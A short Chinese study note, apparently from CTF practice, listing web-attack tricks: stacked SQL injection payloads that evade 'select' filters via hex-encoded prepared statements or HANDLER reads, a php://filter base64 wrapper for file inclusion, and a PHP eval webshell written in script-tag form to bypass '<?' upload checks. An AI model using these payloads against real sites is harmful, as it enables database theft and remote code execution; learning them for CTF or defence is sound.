学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过

相关推荐
DragonnAi3 分钟前
论文解读:SFINet 空间-频率统一学习框架用于多模态图像融合
深度学习·学习·计算机视觉
晓梦林12 分钟前
Commit靶场学习笔记
笔记·学习·安全·web安全
星夜夏空9915 分钟前
STM32单片机学习(4)——嵌入式概述
stm32·单片机·学习
nashane20 分钟前
HarmonyOS 6学习:HWAsan监测开启后应用崩溃的终极解决方案
学习·华为·harmonyos·harmonyos 5
谙弆悕博士27 分钟前
Lua学习笔记
c语言·开发语言·笔记·学习·lua·创业创新·业界资讯
minglie136 分钟前
zynq的栈监控与Xil_XXXAbortHandler问题排查
学习
Understanding_movies1 小时前
【Agent学习】Day13
学习
峥嵘life1 小时前
2026 五一赣州两日游记录:宋城夜色入梦,七鲤古意寻踪
学习
~光~~1 小时前
【AI工具使用配置记录】claude本地安装和使用
学习
LuminousCPP1 小时前
C 语言动态内存管理全解析:从基础函数到柔性数组与内存分区
c语言·经验分享·笔记·学习·柔性数组